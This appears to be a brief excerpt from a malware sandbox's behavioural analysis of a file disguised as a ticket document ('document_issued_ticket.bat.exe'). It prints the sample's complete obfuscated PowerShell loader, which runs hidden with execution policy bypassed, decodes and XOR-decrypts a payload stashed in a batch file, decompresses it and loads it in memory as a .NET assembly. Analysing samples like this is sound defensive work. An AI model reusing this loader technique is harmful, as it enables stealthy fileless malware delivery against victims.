Behavioral Analysis

document_issued_ticket.bat.exe "document_issued_ticket.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_cBxkl = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\test22\AppData\Local\Temp\document_issued_ticket.bat').Split([Environment]::NewLine);foreach ($_CASH_mdxZc in $_CASH_cBxkl) { if ($_CASH_mdxZc.StartsWith(':: @')) { $_CASH_FfFwL = $_CASH_mdxZc.Substring(4); break; }; };$_CASH_FfFwL = [System.Text.RegularExpressions.Regex]::Replace($_CASH_FfFwL, '_CASH_', '');$_CASH_TNdsP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_FfFwL);$_CASH_TEqtm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DDBpabDH7DM2TN2ZgqiHA3ryWSHEEgBrY9DBwNUB2oc=');for ($i = 0; $i -le $_CASH_TNdsP.Length - 1; $i++) { $_CASH_TNdsP[$i] = ($_CASH_TNdsP[$i] -bxor $_CASH_TEqtm[$i % $_CASH_TEqtm.Length]); };$_CASH_dzbKD = New-Object System.IO.MemoryStream(, $_CASH_TNdsP);$_CASH_XbizY = New-Object System.IO.MemoryStream;$_CASH_QqtoQ = New-Object System.IO.Compression.GZipStream($_CASH_dzbKD, [IO.Compression.CompressionMode]::Decompress);$_CASH_QqtoQ.CopyTo($_CASH_XbizY);$_CASH_QqtoQ.Dispose();$_CASH_dzbKD.Dispose();$_CASH_XbizY.Dispose();$_CASH_TNdsP = $_CASH_XbizY.ToArray();$_CASH_ZEeDg = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_TNdsP);$_CASH_cPuRd = $_CASH_ZEeDg.EntryPoint;$_CASH_cPuRd.Invoke($null, (, [string[]] ('')))